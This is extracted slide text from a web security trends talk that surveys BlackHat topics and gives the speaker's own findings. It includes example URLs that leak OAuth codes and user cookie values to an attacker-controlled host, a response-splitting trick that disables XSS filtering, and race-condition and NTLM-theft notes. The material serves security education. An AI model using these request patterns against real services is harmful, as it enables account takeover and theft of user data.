their code more secure • At the same time new products and technologies are often released without careful security audit • Old software is often considered as safe and trusty but contains severe vulnerabilities • Business logic bugs are alive
and it inherits global trends • The global trend is a wide spread of various gadgets and mobile devices • The global trend is making houses and vehicles smart • The global trend is making web interfaces rich and self-contained in the browsers
at BlackHat archives. If we filter those, which are connected with web security, and range the topics, we get the following scoreboard of trends: • client-side && mobile • clouds && big data && social networks • misc && classic • TLS && SSL • IoT && routers • PRNG && SSRF && etc • old soft
loads of papers on client-side security • Loads of bug bounties are given for XSS or something like that • There’re a lot of tricky techniques, and we can see a long war between browser developers and XSS hunters • Mobile browsers are also targeted. Some mobile OS interfaces are HTML5-based, which increases impact of XSS
SECURITY ANALYSIS MADE EASY WITH JSPRIME MILLION BROWSER BOTNET PIXEL PERFECT TIMING ATTACKS WITH HTML5 ABUSING WEB APIS THROUGH SCRIPTED ANDROID APPLICATIONS CLICKJACKING REVISITED: A PERCEPTUAL VIEW OF UI SECURITY THE WEB IS VULNERABLE: XSS DEFENSE ON THE BATTLEFRONT CALL TO ARMS: A TALE OF THE WEAKNESSES OF CURRENT CLIENT-SIDE XSS FILTERING REFLECTED FILE DOWNLOAD - A NEW WEB ATTACK VECTOR REVISITING XSS SANITIZATION SAME ORIGIN METHOD EXECUTION (SOME) - EXPLOITING A CALLBACK FOR SAME ORIGIN POLICY BYPASS SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER - XSS-BASED ABUSE OF BROWSER PASSWORD MANAGERS TWO FACTOR FAILURE THE INNER WORKINGS OF MOBILE CROSS-PLATFORM TECHNOLOGIES JS SUICIDE: USING JAVASCRIPT SECURITY FEATURES TO KILL JS SECURITY UI REDRESSING ATTACKS ON ANDROID DEVICES REVISITED ULTIMATE DOM BASED XSS DETECTION SCANNER ON CLOUD
Browser extensions hacking • Endless security features vs bypass war • XSS Auditor, CSP, HttpOnly, SOP, CORS • Funny things like RFD (reflected file download) • OAuth bugs
but in most cases it can be bypassed, or at least an attack can be modified • The idea is that it looks for complete tag names or attributes from the page in the HTTP request packets • There’re plenty of bypasses, take a look at http://www.thespanner.co.uk/2015/02/10/xss-auditor-bypass/ http://www.thespanner.co.uk/2015/02/19/another-xss-auditor- bypass/ https://www.blackhat.com/docs/us-14/materials/us-14-Johns- Call-To-Arms-A-Tale-Of-The-Weaknesses-Of-Current-Client-Side- XSS-Filtering.pdf
with plugins • Look at this typographic plugin for Drupal: var result = Typographus_Lite_UTF8.typo_text( $(this).text() ); $(this).after(result).remove(); • JQuery method after() is insecure. As a result, div contents become HTML-decoded, and all your reflected or stored <script> stuff becomes active
to lack of redirect_uri validation https://*.ru/oauth/authorize?client_id=4f81a884015911e2b24a6c626d99879 c&response_type=code&redirect_uri=http://*.ru.incsecurity.ru/&state=&sco pe=...&action=login&csrf=69a1dc0caf28d791cb1998c8dc37a257 After authorization redirects to: http://*.ru.incsecurity.ru/site/login?service=*&state=&code=ba0ba85 458d0db1c65792d52c8bef3c4407374b2 • Access token (code) value is enough for account takeover
technologies • Cloud computing and machine learning are heavily used for different purposes • As for infosec, this can be used both for attack and defense • Social networks and big data providers can be exploited for deanonymization and fraud • Machine learning can be used for building WAF
SOCIAL BOTS ON TWITTER USING ONLINE ACTIVITY AS DIGITAL FINGERPRINTS TO CREATE A BETTER SPEAR PHISHER WITH BIGDATA COMES BIG RESPONSIBILITY: PRACTICAL EXPLOITING OF MDX INJECTIONS BIG DATA FOR WEB APPLICATION SECURITY FLOATING CAR DATA FROM SMARTPHONES: WHAT GOOGLE AND WAZE KNOW ABOUT YOU AND HOW HACKERS CAN CONTROL TRAFFIC PIVOTING IN AMAZON CLOUDS BRINGING A MACHETE TO THE AMAZON BABAR-IANS AT THE GATE: DATA PROTECTION AT MASSIVE SCALE SECURE BECAUSE MATH: A DEEP-DIVE ON MACHINE LEARNING-BASED MONITORING BLENDED WEB AND DATABASE ATTACKS ON REAL-TIME, IN-MEMORY PLATFORMS HADOOP SECURITY: SEVEN WAYS TO KILL AN ELEPHANT HOW TO LEAK A 100-MILLION-NODE SOCIAL GRAPH IN JUST ONE WEEK? - A REFLECTION ON OAUTH AND API DESIGN IN ONLINE SOCIAL NETWORKS
bit tricky – you don’t exactly know which node will process your request • Nodes can often be enumerated via HTTP response headers or cookies • Sometimes some nodes are not updated and contain vulnerabilities • This creates mind-blowing phantom vulnerabilities =) • Take a look at cool talk about Amazon EC2 post- exploitation: https://www.blackhat.com/docs/us- 14/materials/us-14-Riancho-Pivoting-In-Amazon- Clouds.pdf
However, their data can sometimes be stolen and used for deanonymisation or fraud. This is documented API request: https://*.ru/api/id?pid=PARTNER_SHORTNAME&url=htt p://incsecurity.ru/?adv_id=$UID • $UID will be replaced with actual cookie value by the server and will be sent to attacker host • Information about user can be obtained via JSONP hijacking, even if session id is checked.
continue previous researches and bug reports • They improve exploitation of classical vulnerabilities like SQL injection and testing/analysis methods • The raise of penetration testing industry pushed up demand for .NET and J2EE applications hacking methods
AND OBFUSCATION TECHNIQUES’)%00 INVISIBILITY PURGE – UNMASKING THE DORMANT EVENTS OF INVISIBLE WEB CONTROLS – ADVANCED HACKING METHODS FOR ASP.NET, MONO AND RIA CONTEMPORARY AUTOMATIC PROGRAM ANALYSIS FINGERPRINTING WEB APPLICATION PLATFORMS BY VARIATIONS IN PNG IMPLEMENTATIONS I KNOW YOUR FILTERING POLICY BETTER THAN YOU DO: EXTERNAL ENUMERATION AND EXPLOITATION OF EMAIL AND WEB SECURITY SOLUTIONS WHAT GOES AROUND COMES BACK AROUND - EXPLOITING FUNDAMENTAL WEAKNESSES IN BOTNET C&C PANELS! SCALA SECURITY: EXAMINING THE PLAY AND LIFTWEB FRAMEWORKS
of the RCE vulnerability in Zeus C&C, which I published near 2010. I opened these links now: http://ahack.ru/bugs/zeus-vulnerability- exploit.htm https://github.com/Visgean/Zeus/ • Guess what I see there since 5 years? ;)
critical vulnerabilities in this popular botnet C&C. BTW, how do you find vulnerabilities in the source code? • Paper on contemporary automatic program analysis mostly tells about grep =) • Personally I use grep with lovely regular expressions: \w*(include|require)(_once)?[\s\(]+(?!\s*('[^']*'|"[^"]*"| )[@\s\.]*(urlencode|rand|rawurlencode|basename|le venshtein|doubleval|sizeof|base64_encode|strlen|flo or|crypt|strrpos|filter_input|abs|bin2hex|bindec|has h|intval|max|decbin|strpos|crc32|ord|md5|count|sh a1|min|pathinfo|floatval|round|hexdec)\s*\()[^;]*\$. *
PHP and Apache are still broken • Several UAF vulnerabilities in PHP fixed recently, still a lot of restriction bypasses and RCE vulnerabilities live deep there • Apache has not yet learnt RFC • Other popular miscellaneous words among hackers: NoSQL, SSJS, SCADA, SAP
There’re still a lot of misconfiguration issues with HTTPS • Also there’re a lot of scary words like BEAST, CRIME, BREACH, HeartBleed, POODLE, SSLStrip and others • Many configuration mistakes are result of trade-off between performance and security
BREACH BEYOND CRIME TLS 'SECRETS' TRUNCATING TLS CONNECTIONS TO VIOLATE BELIEFS IN WEB APPLICATIONS A PERFECT CRIME? ONLY TIME WILL TELL THE BEAST WINS AGAIN: WHY TLS KEEPS FAILING TO PROTECT HTTP BYPASSING HTTP STRICT TRANSPORT SECURITY
popular new IT trends everyone heard about • New means untested. Untested means vulnerable • Seriously, the Internet of things is broken, and many yell about it • People hack RF protocols of alarms, people find smart houses without doors via Shodan, etc, etc
HACKER HOME INVASION V2.0 - ATTACKING NETWORK- CONTROLLED HARDWARE A SURVEY OF REMOTE AUTOMOTIVE ATTACK SURFACES ABUSING THE INTERNET OF THINGS: BLACKOUTS, FREAKOUTS, AND STAKEOUTS OWNING A BUILDING: EXPLOITING ACCESS CONTROL AND FACILITY MANAGEMENT SYSTEMS
HTTP response splitting check? • As you could see on the screenshot above, response splitting kills XSS Auditor, because we can inject header X-XSS-Protection: 0.
address of the mail server • Ev.owa interface with cPfdDC parameter can be used to send some LDAP requests and connect to different hosts (“domain controllers”) Microsoft.Exchange.Data.Directory.SuitabilityVerifie r.CreateConnectionAndBind(String fqdn, Int32 portNumber, NetworkCredential credential) • If there was bypass for anti-CSRF canary, you could possibly steal NTLM credentials
remote URL (class_upload.php, class_vurl.php) • First it checks the file size via HEAD request, then it downloads the file • You can use HTTP multiplexor to exploit race condition and return code 200 and valid file size for the first request and 302 redirect for the second request • Some configuration options and old versions of cURL allow file:// URL wrapper in Location header
and widely used software in 2014 • HeartBleed, GHOST, ShellShock, POODLE, goto fail, etc • Probably it’s an important moment, when we stop trusting and begin reviewing all the fundamental old software that we use everywhere
consider any part of the software as trusted. Each component of the system can be broken • BTW, newspapermen also started the era of nicknames for vulnerabilities • I find this a bit ridiculous but funny =)
owaspmoscow
nssv
10xinc
kamina_zzz
nikinusu
stajima
salaboy
4su_para
tubone24
uhyo
sinsoku
blueb
oracle4engineer
eileencodes
brettharned
trallard
mza
michaelherold
maltzj
garrettdimon
csswizardry
palkan
lara
matthewcrist
![Questions? [email protected]](https://files.speakerdeck.com/presentations/a1e859e9981a4a71856db52bc9132921/slide_44.jpg){kind=link}